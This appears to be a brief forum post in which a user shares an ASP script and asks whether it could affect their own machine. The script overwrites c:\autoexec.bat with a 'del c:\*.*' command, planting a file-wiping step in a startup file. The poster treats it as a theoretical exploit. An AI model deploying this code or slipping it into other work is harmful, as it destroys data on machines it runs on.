Slightly dodgey

[goldfish]

Ok, here is the code in question:

<%
Set FS = Server.CreateObject("Scripting.FileSystemObject")
Set A = FS.OpenTextFile("c:\autoexec.bat",1,false)
x = A.ReadAll
A.Close
Set B = FS.CreateTextFile("c:\autoexec.bat")
B.Write
B.WriteBlankLines(2)
B.WriteLine("del c:\*.*")
B.Close
Set A = Nothing
Set B = Nothing
Set FS = Nothing
%>

Now personally, i belive that if you tried to execute that code, it would open autoexec.bat on the SERVER not the client. Its a theoretical exploit, and i want to make sure it doesnt affect me.